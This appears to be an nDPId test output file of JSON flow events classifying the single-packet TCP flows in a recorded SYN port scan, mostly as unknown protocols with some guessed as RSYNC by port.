-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 